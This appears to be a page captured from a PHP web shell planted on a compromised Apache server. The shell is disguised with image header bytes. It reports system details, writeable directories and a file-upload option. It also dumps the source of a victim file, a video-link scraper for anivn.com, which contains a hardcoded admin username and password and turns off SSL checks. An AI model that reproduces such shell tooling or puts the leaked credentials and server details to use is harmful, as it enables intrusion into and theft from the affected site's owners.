ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/anivn.php
<?php
define('ADMIN_USERNAME','buondoiwa'); 	// Admin Username
define('ADMIN_PASSWORD','gunblade');  	// Admin Password
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != ADMIN_USERNAME ||$_SERVER['PHP_AUTH_PW'] != ADMIN_PASSWORD) {
    header("WWW-Authenticate: Basic realm=\"Login\"");
    header("HTTP/1.0 401 Unauthorized");

    echo '<html><body>
				<h1>Rejected!</h1>
				<big>Wrong Username or Password!</big>
				</body></html>';
    exit();
}
//include("cryptojs-aes.php");
function post($url,$data) {
    $header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
    $header[0] .= "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
    $header[] = "Cache-Control: max-age=0";
    $header[] = "Connection: keep-alive";
    $header[] = "Keep-Alive: 300";
    $header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $header[] = "Accept-Language: en-us,en;q=0.5";
    $header[] = "Pragma: "; // browsers keep this blank.
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36';
    $process = curl_init($url);
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_REFERER, 'http://www.anivn.com');
//curl_setopt($process, CURLOPT_HEADER, 1);
    curl_setopt($process, CURLOPT_USERAGENT, $user_agent);
    //curl_setopt($process, CURLOPT_COOKIEFILE, 'cookies.txt');
    // curl_setopt($process, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($process, CURLOPT_ENCODING , 'gzip');

    curl_setopt($process, CURLOPT_TIMEOUT, 10);
//if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, $this->proxy);
    curl_setopt($process, CURLOPT_POSTFIELDS, $data);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($process, CURLOPT_POST, 1);
    $return = curl_exec($process);
    curl_close($process);
    return $return;
}
function printLinksReport($link) {
    $log_msg_html = "$link<br>\n";
    print $log_msg_html;
    flush();
}
if(isset($_GET['url'])) {
    $url2 = trim($_GET['url']);
        $id = intval(str_replace('.html', '', basename($url2)));
        $url = 'http://www.anivn.com/ajaxanime.php';
        $data = 'anivnid=' . $id;
        $content = post($url, $data);
        preg_match('#\{file\: \"(.*?)\"\,#is', $content, $match);
        print_r($match);
        exit();
        if (!empty($match[1])) {
            //$link_encode = trim($match1[1]);
            $link_decode = $match[1];

            $parts = parse_url($link_decode);
            parse_str($parts['query'], $query);
            $drive_id = $query['driveid'];
            //$drive_url = 'https://drive.google.com/open?id=' . $drive_id;

            if (!empty($drive_id)) {
                $drive_url = 'https://drive.google.com/open?id=' . $drive_id;
                printLinksReport($drive_url . '@');
                //$server[] = $drive_url;
            } else {
                printLinksReport($val . '@');
                //$server[] = $val;
            }
        } else {
            printLinksReport($val . '@');
        }

}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Doom document</title>
    <script type="text/javascript" src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.1.min.js"></script>
</head>
<body>
<div class="boxnhac6">
    <span style="color:#FFFFFF"> <h2> Phim19.Com</h2></span>
    <span>Những ô có dấu <span>*</span> là yêu cầu nhập</span>                             </div>

<div class="boxnhac6">
    <form action="anivn.com.php" method="post" id="create" name="create">


        <table width="100%" border="0" cellspacing="4" cellpadding="4">

            <tr>
                <td width="20%"><span class="WhiteText">body :</span></td>
                <td align="left" width="80%">
                    <textarea style="width: 500px; height: 100px;" name="body"></textarea>
                </td>
            </tr>


            <tr>
                <td>&nbsp;</td>
                <td align="center" id="txt_error" style="color:#FF0000;">

                </td>
            </tr>
            <tr>
                <td>&nbsp;</td>
                <td align="right">

                    <input type="hidden" name="submitbt" id="submitbt"  value="1" />
                    <input type="submit" name="submit2" id="submit2"  value="Cập nhật" class="button" />
                </td>
            </tr>
        </table>
    </form>
</div>
<script type="text/javascript">
    $('#submit2').click(function(){
        var url_sh = $('#url').val();
        var url_sh2  = url_sh.replace("http://", "");
        $('#url').attr('value',url_sh2);
        return $('#create').submit();
    });
</script>
</body>
</html>

ZeroDay Forums Mini